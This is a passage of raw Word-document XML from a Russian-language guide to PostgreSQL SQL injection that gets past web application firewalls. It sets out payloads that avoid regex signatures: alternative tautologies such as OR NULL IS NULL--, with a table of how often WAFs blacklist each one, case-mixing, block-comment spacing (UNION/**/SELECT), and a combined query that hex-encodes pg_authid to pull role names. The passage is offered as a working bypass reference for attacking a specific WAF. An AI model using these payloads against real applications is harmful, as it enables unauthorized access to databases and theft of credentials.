        <w:t xml:space="preserve"> Атакующий ставит сам себе ловушку, когда WAF использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: paylod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против </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bUNION\s+SELECT\b</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re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывает на сигнатуре. Поэтому 3.9.6 Payload C применим только когда фильтрация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">точно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> case-sensitive — иначе он эквивалентен обычному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и блокируется как раз WAF из 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload D — альтернативные тавтологии (без `OR 1=1`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF 3.9.0 блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> точечно — это самая часто-сигнатура SQLi-сканеров. Семантически эквивалентные конструкции, которые не покрываются этим конкретным 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Тавтология</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Парсит ли PG</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Часто в WAF-blacklist?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 2&lt;3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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2&lt;3</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true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редко (есть в CRS 942360)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 NULL IS NULL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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NULL IS NULL</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true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редко</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 true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литерал </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">true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иногда (как keyword)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 'a'='a'</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если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разрешён</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часто (есть в CRS)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 EXISTS(SELECT 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всегда </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">true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редко (часть subquery-правил)</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 (1)+(1)=(2)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арифметика → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">true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очень редко</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 OR NULL IS NULL--</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id, title, body FROM articles WHERE title = 'x' OR NULL IS NULL--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выражение типа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всегда возвращает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(отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL = NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которое в SQL даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не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потому что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 NULL — undefined; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельный оператор, специально для NULL-check). PG-планировщик упрощает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE x OR true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и возвращает все строки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативные комбинации, полезные когда блокированы и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IS NULL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OR 'x'='x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — классика, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'x'='x'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> часто блокируется как самостоятельная сигнатура.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OR 0&lt;1--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — числовое сравнение, не паттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\d=\d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OR (SELECT true)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — subquery, всегда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OR length('a')&gt;0--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — function call с очевидным результатом; полезно когда WAF блокирует и сравнения, и литералы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Анти-паттерн (PG-специфичный): Unicode-whitespace.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> В MySQL и MSSQL некоторые Unicode-пробелы (NBSP U+00A0, em-space U+2003, ideographic space U+3000) лексер трактует как whitespace; в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">нет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — только пять ASCII-символов из §4.1.1. Если WAF Python-уровня пропускает Unicode-пробел (потому что Python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re.UNICODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ловит NBSP), а PG-парсер ждёт ASCII whitespace — атака сорвётся на парсере PG, не на WAF. Для PG-инъекций Unicode-whitespace бесполезен и опасен (создаёт ложное чувство, что приём сработает).</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 — PG-лексер удаляет block-comment до этапа разбора синтаксиса, оставляя на месте комментария «логический whitespace». Regex-фильтр работает по символам строки до парсинга — </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 ≠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserv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Tab/CR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re</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их ловит, но bytes-level фильтры (старый ModSecurity, custom-C-санитайзеры) — нет; URL-encoded формы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%09</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%0D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%0C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после decode остаются непробельными в native byte view фильтра.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Case-mixing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакует Python substring match без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.upper()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нормализации. Сигнал на пропуск: фильтр не использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или эквивалент.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Альтернативные тавтологии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точечный regex на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает семантически эквивалентные формы. WAF-вендоры со временем добавляют новые сигнатуры; кастомные blacklist-ы — почти никогда.</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Block-comments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG Lexical Structure §4.1.5 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* comment */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсится как whitespace. Допускается вложение: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/* /* nested */ */</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — корректно (одна из немногих СУБД, которая поддерживает вложенные комментарии; см. 3.12.1 для эксплойта парсера). Пустой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валиден.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Whitespace alphabet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: §4.1.1 — список фиксирован: space, tab, newline, CR, form feed. Не Unicode-aware.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Case-insensitivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: §4.1.1 —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unquoted identifiers нормализуются к lower-case. Quoted identifiers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сохраняют регистр.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Boolean coercion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NULL IS NULL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2&lt;3</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EXISTS(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выражения типа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корректно подставляются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 PG-планировщик умеет упрощать конст-выражения (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">true OR 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7.x – 17 (все поддерживаемые)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — лексические правила (whitespace, comments, case-rules) стабильны как минимум с 7.4. Block-comment nesting — с 7.4.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везде. Это уровень парсера, провайдер на него не влияет.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WAF-специфика</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: набор сигнатур и их поведение зависят от вендора и версии rule-set. Под конкретный WAF приём калибруется отдельно; здесь даны общие принципы.</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3.9.1 (dollar-quote)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комплементарно: 3.9.6 ломает разделитель токенов, 3.9.1 ломает strings без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Часто используются вместе: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.9.1) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.9.6 внутри dollar-quoted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3.9.2 / 3.9.3 / 3.9.4 / 3.9.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — про скрытие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержимого</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> литералов. 3.9.6 про разделители — ортогональный класс. Комбинируются: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UnIoN/**/SeLeCt rolname FROM E'\x70\x67\x5f\x61\x75\x74\x68\x69\x64'::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — case-mix + whitespace-trick + E-string.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3.12.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
